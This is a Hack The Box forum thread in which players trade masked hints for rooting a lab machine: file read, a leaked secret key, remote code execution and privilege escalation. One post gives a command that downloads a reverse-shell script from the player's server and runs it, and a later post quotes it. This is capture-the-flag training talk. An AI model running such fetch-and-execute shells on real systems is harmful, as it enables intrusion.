Official Laboratory Discussion

Finally rooted this one. Definitely not an easy box considering the foothold.

Some hints.

Foothold:
Set up a local env so you know what to fetch. Then, if you have the right article, you should be able to get a shell.

User Shell
After getting a shell, see what you can change with the current shell.

Root Shell
This shouldn’t be too hard. Your enum script should show something with extra capabilities. See what it does by looking inside it.

If you want any nudges, DM me.
Discord: thatjoe#1201

Connection timed out 90% of the time

Probably because htb is blocked in my country

I have a question: the version in G*** is “Community Edition”, so why in the ■■■■ when we set up our environment is it with the Enterprise Edition!!!

@TazWake said:

Is there a solution for the 502 problem? Has anyone reported it to HTB?

It is a matter of waiting for a while. I read it in previous messages and it usually works.

@Darvidor said:

@TazWake said:

Is there a solution for the 502 problem? Has anyone reported it to HTB?

It is a matter of waiting for a while. I read it in previous messages and it usually works.

Thanks. I’d waited ~45 minutes before I reported it, then annoyingly about 2 minutes after the support people got involved it worked.

My issue with the box is even a few minutes wait will mean half the world will try to reset the box thinking it is broken, which keeps it permanently broken. If people raise tickets with HTB, hopefully, they will get the idea that there is a problem.

Other than that one issue, it is a really good box.

Hi, I need help with the initial foothold. I found a way to read files from the host. Ok. I got one necessary file which contains a key required to get a shell (difficult to explain without making a spoiler).

I followed the instructions for that vulnerability. It works locally on my Kali box, but when I try to send something to the laboratory it is always unsuccessful. It is really frustrating. If anyone can guide me I will appreciate it. Thanks. PM me if you can, or I can PM you. Thank you.

@aimforthehead said:

I believe I made some progress here -
I’ve replaced the sXXXXX_XXy_XXXe that I got using the exploit with the one in my environment in my dXXXXX-cXXXXXX.yXX.
Next, I got into the gXXlXX environment shell in order to get the train console.
Once I got there, the version shown once the console is loaded is different from the one I set prior to that in the first file I mentioned.

Does that make any sense? It seems that the exploit is “working” and that the example file
is created once each line of the exploit is entered.

If this is somewhat of a spoiler please remove it, hopefully not.
I could use some guidance on the next steps to getting RCE.

thanks

Because it is not that file (I think it’s a .j**n, check the docs), and you need to restart the service (to apply the key).

@waza said:

What I suggest for those with payload problems is: download a shell script from your local python http.server to perform the reverse shell; special symbols may cause problems.

This approach got me good: wget "yourserver/rev.sh" && chmod +x rev.sh && ./rev.sh

Trying the bash rev shell directly did not work for me, and the one I mentioned above was reliable every time (used it like 6 times due to resets and stuff).

Perfect!!! Thanks for the tip!!!

Just got the shell. This took me almost 2 days to make the reverse shell work. Steps I followed:

1 - Get a Gb Dr environment working on your machine.
2 - Find a way to execute a R** that uses the secret found through SS**. There are 2 pages that I found that describe the process: ha****n slide and va** note on hae.
3 - Tip from @waza for wget (This was the tip that saved me lots of time)
4 - Find the correct reverse shell.

Rooted !

Hardest “easy” box I’ve done so far. The user part requires multiple steps and the exploitable service is unstable (as previously discussed), which makes the box tiring.
The root part is very easy if you spot the right thing !

PM me if needed :slight_smile:

Rooted, but the user part is not easy. For me, rating this box as easy is a mistake.
Of course it’s interesting and fun, but not easy.
PM me if you need some hint.

Genuinely feel empathetic for newcomers who’re trying to root this machine.

Ok, so after a lot of trials and errors, I finally got a shell.
Currently working on user. It seems a bit tricky, I guess, since you’re inside
a con*****. I found some things that
the seed script gave me, which are not giving away things.

I did find the username and the to**.txt, but I’m struggling to alter the
user password using pos****.

Could use a nudge here.

@aimforthehead said:

Ok, so after a lot of trials and errors, I finally got a shell.
Currently working on user. It seems a bit tricky, I guess, since you’re inside
a con*****. I found some things that
the seed script gave me, which are not giving away things.

I did find the username and the to**.txt, but I’m struggling to alter the
user password using pos****.

Could use a nudge here.

The platform has a way of bundling stuff up which can be useful. If you get it back, you can bring it back to life and find something really handy.

Ok, so got user. I want to mention a couple of things here -

  1. There is more than one way to get user.
  2. I’ve noticed an issue with the id_*** file. I was getting “bad format” when trying ssh with our friend de**** via ssh. What worked for me was
    https://forum.hackthebox.eu/discussion/3166/starting-point-markup-ssh-key-invalid-stuck-trying-to-get-user-txt/p1 (the 3rd post).

Moving onto root.

EDIT:
rooted, finally.
thanks both @waza and @HomeSen for their great insights and help.

@aimforthehead said:

Ok, so got user. I want to mention a couple of things here -

  1. There is more than one way to get user.
  2. I’ve noticed an issue with the id_*** file. I was getting “bad format” when trying ssh with our friend de**** via ssh. What worked for me was
    https://forum.hackthebox.eu/discussion/3166/starting-point-markup-ssh-key-invalid-stuck-trying-to-get-user-txt/p1 (the 3rd post).

Moving onto root.

Regarding the file: Just add a newline at the end, and you’re good to go. “Newer” versions of the tool seem to choke on it, when there’s no line-break at the end ^^

Getting a 502 error on G****** for the last 1 hr

@pagal said:

Getting a 502 error on G****** for the last 1 hr

Check if the machine has been restarted. The service (and all the other services it depends on) takes its time to start. Otherwise, try resetting the box, and wait ~5-10 minutes.

Hello All

Got a register interface,
but an error with email domains :confused:

=> “Email domain is not authorized for sign-up”
?